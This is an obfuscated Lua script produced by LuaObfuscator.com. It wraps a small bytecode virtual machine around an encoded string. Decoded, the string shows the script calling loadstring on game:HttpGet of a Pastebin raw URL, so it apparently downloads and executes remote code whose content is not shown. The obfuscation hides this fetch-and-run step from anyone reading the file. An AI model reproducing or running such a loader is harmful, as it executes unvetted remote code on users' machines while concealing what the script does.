--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==0) then v94=v5(v81,v19);v19=nil;v93=1;end if (v93==1) then return v94;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -((790 -235) + 64)))) + (932 -(857 + (1139 -(68 + 997)))))) ;return v82-(v82%1) ;else local v83=568 -((1637 -(226 + 1044)) + 201) ;local v84;while true do if (v83==(927 -((931 -717) + 713))) then v84=(1 + 1)^(v32-((118 -(32 + 85)) + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + ((3 -1) -1) ;v34=1 -0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * (188 + 68)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (11 -8) );v18=v18 + (9 -5) ;return (v41 * (45169940 -28392724)) + (v40 * (48199 + 17337)) + (v39 * 256) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,1,(1455 -(145 + 293)) -(915 + 82) ) * (((2 + 3) -3)^(19 + 11 + 2))) + v42 ;local v46=v20(v43,21,40 -9 );local v47=((v20(v43,1219 -(1069 + 118) )==((432 -(44 + 386)) -1)) and  -((773 -(201 + 571)) -0)) or (1 + 0) ;if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * (791 -(368 + 423)) ;else v46=3 -2 ;v44=(1156 -(116 + 1022)) -(10 + 8) ;end elseif (v46==2047) then return ((v45==(0 -(0 -0))) and (v47 * (1/(442 -(416 + 26))))) or (v47 * NaN) ;end return v8(v47,v46-(3266 -2243) ) * (v44 + (v45/((1 + 1)^((1577 -(998 + 488)) -39)))) ;end local function v25(v48) local v49=0 + 0 ;local v50;local v51;while true do if (((1087 -(1020 + 60)) -5)==v49) then v51={};for v95=1, #v50 do v51[v95]=v2(v1(v3(v50,v95,v95)));end v49=10 -7 ;end if (v49==(860 -(814 + 45))) then v50=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;v49=1 + (1424 -(630 + 793)) ;end if (v49==(2 + 1)) then return v6(v51);end if (v49==0) then v50=nil;if  not v48 then v48=v23();if (v48==(885 -(261 + 624))) then return "";end end v49=1 -0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 469 -(159 + 310) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if ((4 -2)~=v52) then else local v88=(function() return 0;end)();local v89=(function() return;end)();while true do if (v88~=0) then else v89=(function() return 0;end)();while true do if (v89~=1) then else v57[ #"-19"]=(function() return v21();end)();v52=(function() return 938 -(39 + 896) ;end)();break;end if (v89==0) then local v115=(function() return 0 -0 ;end)();while true do if (v115~=0) then else v59=(function() return {};end)();for v153= #"}",v58 do local v154=(function() return 0;end)();local v155=(function() return;end)();local v156=(function() return;end)();while true do if (0~=v154) then else v155=(function() return v21();end)();v156=(function() return nil;end)();v154=(function() return 1 -0 ;end)();end if (1~=v154) then else if (v155== #"}") then v156=(function() return v21()~=(0 -0) ;end)();elseif (v155==(2 + 0)) then v156=(function() return v24();end)();elseif (v155== #"19(") then v156=(function() return v25();end)();end v59[v153]=(function() return v156;end)();break;end end end v115=(function() return 1;end)();end if (v115~=(1 + 0)) then else v89=(function() return 397 -(115 + 281) ;end)();break;end end end end break;end end end if ((0 -0)==v52) then local v90=(function() return 0 + 0 ;end)();local v91=(function() return;end)();while true do if (v90~=(0 -0)) then else v91=(function() return 0;end)();while true do if (v91~=0) then else v53=(function() return function(v143,v144,v145) local v146=(function() return 0 -0 ;end)();local v147=(function() return;end)();while true do if ((867 -(550 + 317))==v146) then v147=(function() return 0;end)();while true do if (v147~=0) then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==(0 -0)) then v173=(function() return 0;end)();while true do if (v173==(0 -0)) then v143[v144-#"[" ]=(function() return v145();end)();return v143,v144,v145;end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v91=(function() return 1;end)();end if (v91==1) then v55=(function() return {};end)();v52=(function() return 2 -1 ;end)();break;end end break;end end end if (v52~=(286 -(134 + 151))) then else local v92=(function() return 0;end)();while true do if ((1665 -(970 + 695))==v92) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v92=(function() return 1991 -(582 + 1408) ;end)();end if (v92~=1) then else v58=(function() return v23();end)();v52=(function() return 2;end)();break;end end end if (v52==3) then for v97= #",",v23() do local v98=(function() return v21();end)();if (v20(v98, #"\\", #"{")==(0 -0)) then local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=1) then else local v116=(function() return 0;end)();local v117=(function() return;end)();while true do if (v116==0) then v117=(function() return 0;end)();while true do if (v117==(1 -0)) then v104=(function() return 7 -5 ;end)();break;end if (v117==0) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 -0)) then local v174=(function() return 241 -(187 + 54) ;end)();local v175=(function() return;end)();while true do if ((780 -(162 + 618))==v174) then v175=(function() return 0 + 0 ;end)();while true do if (v175==(0 + 0)) then v107[ #"xxx"]=(function() return v22();end)();v107[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v105== #"|") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==(3 -1)) then v107[ #"gha"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v105== #"xxx") then local v181=(function() return 0 + 0 ;end)();local v182=(function() return;end)();while true do if ((1636 -(1373 + 263))==v181) then v182=(function() return 1000 -(451 + 549) ;end)();while true do if (v182==(0 + 0)) then v107[ #"-19"]=(function() return v23() -(2^16) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v117=(function() return 1 -0 ;end)();end end break;end end end if (v104~=(0 -0)) then else local v118=(function() return 1384 -(746 + 638) ;end)();while true do if (v118==(0 + 0)) then v105=(function() return v20(v98,2 -0 , #"19(");end)();v106=(function() return v20(v98, #"?id=",347 -(218 + 123) );end)();v118=(function() return 1582 -(1535 + 46) ;end)();end if (v118~=(1 + 0)) then else v104=(function() return 1;end)();break;end end end if (v104~=(1 + 2)) then else if (v20(v106, #"-19", #"nil")~= #"[") then else v107[ #"xnxx"]=(function() return v59[v107[ #"0313"]];end)();end v54[v97]=(function() return v107;end)();break;end if (v104==(562 -(306 + 254))) then if (v20(v106, #"\\", #"|")~= #"]") then else v107[1 + 1 ]=(function() return v59[v107[2]];end)();end if (v20(v106,3 -1 ,2)== #"<") then v107[ #"xxx"]=(function() return v59[v107[ #"91("]];end)();end v104=(function() return 3;end)();end end end end for v99= #" ",v23() do v55,v99,v28=(function() return v53(v55,v99,v28);end)();end return v57;end end end local function v29(v60,v61,v62) local v63=v60[1468 -(899 + (2147 -1579)) ];local v64=v60[2 + (1212 -(323 + 889)) ];local v65=v60[7 -4 ];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=604 -(268 + 335) ;local v71= -(291 -(60 + 230));local v72={};local v73={...};local v74=v12("#",...) -(1 + 0) ;local v75={};local v76={};for v85=1456 -((758 -476) + 1174) ,v74 do if ((v85>=v68) or (3275==1804)) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[812 -(569 + 242) ];if (v79<=(17 -11)) then if ((v79<=(1 + 1)) or (1417>3629)) then if ((2821<=4824) and (v79<=(1024 -(706 + 318)))) then local v108=v78[1253 -(721 + 530) ];local v109,v110=v69(v76[v108](v13(v76,v108 + 1 ,v78[1274 -(945 + 326) ])));v71=(v110 + v108) -(2 -1) ;local v111=0;for v120=v108,v71 do v111=v111 + 1 ;v76[v120]=v109[v111];end elseif (v79>(1 + 0)) then v76[v78[702 -(271 + (1009 -(361 + 219))) ]]();else local v123=(320 -(53 + 267)) + 0 ;local v124;local v125;while true do if ((1738<=2195) and (v123==(1501 -(1408 + 92)))) then v76[v124 + (1087 -(461 + 625)) ]=v125;v76[v124]=v125[v78[4]];break;end if ((41<=3018) and (v123==(1288 -(993 + 295)))) then v124=v78[2];v125=v76[v78[1 + 2 ]];v123=(265 + 907) -(418 + 753) ;end end end elseif (v79<=(2 + (415 -(15 + 398)))) then if (v79>(1 + (984 -(18 + 964)))) then local v126=0 + 0 ;local v127;local v128;while true do if (v126==((3 -2) + 0)) then v76[v127 + (530 -(406 + 123)) ]=v128;v76[v127]=v128[v78[1773 -(1749 + 20) ]];break;end if (v126==(0 + 0)) then v127=v78[1324 -(1249 + 73) ];v128=v76[v78[2 + 1 + 0 ]];v126=1146 -(466 + 428 + 251) ;end end else do return;end end elseif (v79==(11 -6)) then v76[v78[2]]=v78[8 -(855 -(20 + 830)) ];else v76[v78[1902 -(106 + 1794) ]]=v62[v78[1 + 2 ]];end elseif ((2145<=4104) and (v79<=9)) then if ((2689<4845) and (4795>402) and (v79<=(2 + 5))) then v76[v78[2]]=v62[v78[3 + 0 ]];elseif ((4813>3565) and (v79==8)) then do return;end else v76[v78[5 -3 ]]=v78[7 -4 ];end elseif (v79<=(125 -(4 + (236 -(116 + 10))))) then if (v79==(594 -(57 + 527))) then local v135=v78[2];local v136,v137=v69(v76[v135](v13(v76,v135 + ((106 + 1322) -(41 + 1386)) ,v78[106 -(17 + 86) ])));v71=(v137 + v135) -(1 + (738 -(542 + 196))) ;local v138=(0 -0) -0 ;for v151=v135,v71 do local v152=0 -0 ;while true do if ((3912==3912) and (v152==(166 -(122 + 44)))) then v138=v138 + (1 -0) ;v76[v151]=v136[v138];break;end end end else local v139=v78[(2 + 4) -4 ];v76[v139]=v76[v139](v13(v76,v139 + 1 ,v71));end elseif (v79==(10 + 2)) then local v141=0 + 0 + 0 ;local v142;while true do if ((v141==(0 + 0)) or (2322>2622)) then v142=v78[3 -1 ];v76[v142]=v76[v142](v13(v76,v142 + (66 -(30 + 35)) ,v71));break;end end else v76[v78[2 + 0 ]]();end v70=v70 + (1258 -(1043 + 214)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F6E70616679464B7000083O0012073O00013O001207000100023O002001000100010003001209000300044O000A000100034O000B5O00022O00023O000100012O00033O00017O00",v9(),...);
